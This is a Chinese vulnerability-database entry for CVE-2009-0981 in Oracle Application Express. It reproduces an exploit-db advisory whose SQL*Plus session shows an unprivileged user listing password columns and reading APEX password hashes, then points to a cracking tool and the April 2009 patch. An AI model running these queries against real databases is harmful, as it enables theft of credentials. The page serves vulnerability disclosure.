Oracle Database 组件Application Express 未明身份认证和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117597 漏洞类型
发布时间 2009-04-16 更新时间 2009-06-08
CVE编号 CVE-2009-0981 CNNVD-ID CNNVD-200904-300
漏洞平台 Multiple CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/8456
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-300
|漏洞详情
OracleDatabase是一款商业性质大型数据库系统。Oracle组件ApplicationExpress存在未明身份认证和访问控制漏洞,远程认证用户通过未知向量可能影响系统机密性,与APEX相关。
|漏洞EXP
Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]

Name 			Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Systems Affected 	APEX 3.0 (optional component of 11.1.0.7 installation)
Severity 		High Risk
Category 		Password Disclosure
Vendor URL 		http://www.oracle.com/
Author 			Alexander Kornbrust (ak at red-database-security.com)
CVE 			CVE-2009-0981
Advisory 		14 April 2009 (V 1.00)


Details
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
Tested on 11.1.0.7.

C:\> sqlplus dummy/dummy
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
------------------------------
CONNECT


SQL> select owner,table_name from all_tables where owner='FLOWS_030000';

OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE



Get a list of all columns containing the string "%PASSWORD%'

SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';

OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE

9 rows selected.


SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.


Patch Information
Apply the patches for Oracle CPU April 2009.


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

# milw0rm.com [2009-04-16]
|参考资料

来源:US-CERT
名称:TA09-105A
链接:http://www.us-cert.gov/cas/techalerts/TA09-105A.html
来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html
来源:SECTRACK
名称:1022052
链接:http://www.securitytracker.com/id?1022052
来源:BUGTRAQ
名称:20090416UnprivilegedDBuserscanseeAPEXpasswordhashes
链接:http://www.securityfocus.com/archive/1/archive/1/502724/100/0/threaded
来源:MISC
链接:http://www.red-database-security.com/advisory/apex_password_hashes.html
来源:MILW0RM
名称:8456
链接:http://www.milw0rm.com/exploits/8456
来源:SECUNIA
名称:34693
链接:http://secunia.com/advisories/34693
来源:OSVDB
名称:53738
链接:http://osvdb.org/53738